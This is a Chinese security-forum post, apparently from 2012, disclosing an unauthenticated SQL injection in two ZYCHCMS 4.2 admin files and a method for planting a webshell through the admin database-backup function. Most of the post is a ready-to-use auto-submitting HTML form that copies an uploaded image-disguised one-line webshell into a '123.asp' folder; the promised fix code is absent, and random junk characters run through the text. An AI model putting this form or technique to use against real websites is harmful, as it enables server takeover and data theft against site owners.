找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 1856|回复: 0
打印 上一主题 下一主题

ZYCHCMS企业网站管理系统SQL注入漏洞及后台拿webshell

[复制链接]
跳转到指定楼层
楼主
发表于 2012-9-10 21:09:51 | 只看该作者 回帖奖励 |正序浏览 |阅读模式

9 B$ @, M# s1 N9 L3 g& V3 u. _: q$ d7 }/ l

* l, b& i" x; [# `7 w
' F3 t9 q% E# P2 T影响版本:ZYCHCMS企业网站管理系统4.2(存在以下两个文件的版本应该是通杀)+ E) o9 y5 D3 h& k( g2 N8 o5 S
①SQL注射漏洞
: ]9 ]( R& K+ K, a% f& i 漏洞文件:/admin/add_js.asp & /admin/add_xm_jiang.asp
7 R7 \! W3 T& _- e 漏洞原因:未过滤- Y* b4 K9 a3 }  ]# X5 d! |
漏洞代码:& |7 e8 A/ {3 A
都是相同的,文件开头没有调用过滤文件/admin/seeion.asp,导致没有对当前权限进行判断,就直接操作数据库。
, z8 q) g4 {, M5 K 修复方法:在文件开头加入代码
% I( `+ X3 r& O9 ]$ X5 y+ D
9 }8 z, F  p6 o1 Y3 i3 {1 O9 S* n3 \/ i0 x0 i
②后台拿WBSHELL3 s  G. M. [2 J: a- V
进入后台有一个数据库备份,可以通过本地提交突破创建.asp后缀文件夹,并将一句话备份进去。4 [+ H$ [5 f6 c
这里在网上找了一个,改了下,将就着用。  ?" y* s3 q4 S; T0 @, _: ?
以下是代码本地提交代码
3 K! }% O* v' `+ B4 P% [0 u; d : F/ E, Y0 O. c5 G2 b

6 \: e, L2 N/ R$ s& f<form method=”post” action=”http://localhost/admin/Manage_backup.asp?action=Backup” name=add>
; r0 C1 H  f8 _% B  z0 ` <!–eg:http://127.0.0.1:99/admin/Manage_backup.asp?action=Backup–>( T$ P/ ]* Q6 A' Y+ L
<tr>1 {/ l, O- T' v! f) F5 ?
<td height=”30″ background=”images/bg_list.gif”><div style=”padding-left:10px; font-weight:bold; color:#FFFFFF; text-align:left”>备份数据库</div></td>. Z$ ]) N4 x; D% ?
</tr>
- w+ E. U7 g2 c3 f& M2 @ <tr>( _5 r! V5 a+ J3 i! b
<td bgcolor=”#FFFFFF”><span class=”back_southidc”>
9 H& s, Q. K! q) u- O% ]- i* B </span>
5 ?/ |% V; ]1 e! _ <table width=”100%” border=”0″ align=”center” cellpadding=”5″ cellspacing=”0″ >% ]  e# @$ x! e! l* Q
<tr onmouseover=”style.backgroundColor=’#EEEEEE’” onmouseout=”style.backgroundColor=’#F1F5F8′” bgcolor=”#F1F5F8″ >9 t+ N- N& X0 G7 G$ l
<td height=”25″ width=”30%” class=”td”><div align=”left”>当前数据库路径</div></td># m  E- @! s" |7 ?6 t1 J
<td width=”70%” class=”td”>90sec. K5 L9 v8 S8 d
) s  f! s# p9 `1 @/ r$ Y <div align=”left”>
9 K, l* C$ Z" C& m; l <input type=”text” size=”30″ name=”DBpath” value=”此处为你在其网站上传的图片格式一句话路径” />; h- k% u& f" Y! m* h! b
<!–eg:../uploadfile/image/Logo/20120803130885328532_ZYCH.jpg>( z. t- B+ T; \
<input type=”hidden” size=”50″ name=”bkfolder” value=”123.asp” />
( w) \  [5 j+ M* L5 E+ V </div></td>9 e: j0 Z% k( ^
</tr>0 B- S, P. v1 `# U4 T8 \( Q
<tr onmouseover=”style.backgroundColor=’#EEEEEE’” onmouseout=”style.backgroundColor=’#FFFFFF’” bgcolor=”#FFFFFF”>
$ A+ u! {8 a  n4 b/ }; h  u7 [6 J <td height=”25″ width=”30%” class=”td”><div align=”left”>备份数据库名称</div></td>
1 F" p0 Z- V% L& y <td class=”td”><div align=”left”>( x; N6 n& ~; B. E+ k$ Q
<input type=”text” size=”30″ name=”bkDBname” value=”4.mdb” />( Z( g+ z4 ~: P, r0 m$ \: p1 E
[如备份目录有该文件,将覆盖,如沒有,将自动创建]</div></td>
* L9 ~( _9 c; k5 u- d" Z% d: [ </tr>: t1 h$ E! b- B; a3 g; n
<tr onmouseover=”style.backgroundColor=’#EEEEEE’” onmouseout=”style.backgroundColor=’#F1F5F8′” bgcolor=”#F1F5F8″>
  y  h& [4 l# I, I$ o8 w/ s <td height=”25″ width=”30%” class=”td”><div align=”left”></div></td>6 S8 q% w" s/ L9 u6 d
<td class=”td”><div align=”left”>1 ]3 p* u8 H" a2 \# Q* J
<input type=”submit” value=”确定备份” class=”btn”
, P. G. c: U, l1 o </div></td>
' q2 L. z/ F$ b7 n </tr>% r9 Y7 K1 @1 G% S
</table></td></tr></form>3 h5 z0 c; l6 b( f: a8 M
</table>
1 q$ u: g; j: D" c( t$ v: o) R </td>2 K1 M2 ^5 }' l6 U8 J/ u
</tr>" s% t3 W6 h$ v8 D7 \* ^
</table>1 n* T2 h7 N8 M9 T9 g5 w
<script>; L% y+ `+ ^/ F5 P. e& C1 N$ K
document.all.add.submit();
0 v8 t3 Q% D) g: c% g, { </script>/ |, N& p# T+ F8 ?/ ?) F: J

' _; A. t9 \7 U9 L3 T! m6 e( a$ d- h6 t/ `$ n

# V5 J4 q1 ?/ R3 u- q3 U5 |9 W. t

2 l4 ^% M8 T. Q- j. J0 A8 O9 s
" Z6 B! v: e" F1 E6 Z! v6 x9 K8 M3 W9 @* V  i

" a, D% t0 V) o8 V3 B7 M8 y, O5 N: d$ u( Y: X
8 W9 i. @7 h$ |; L5 F
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表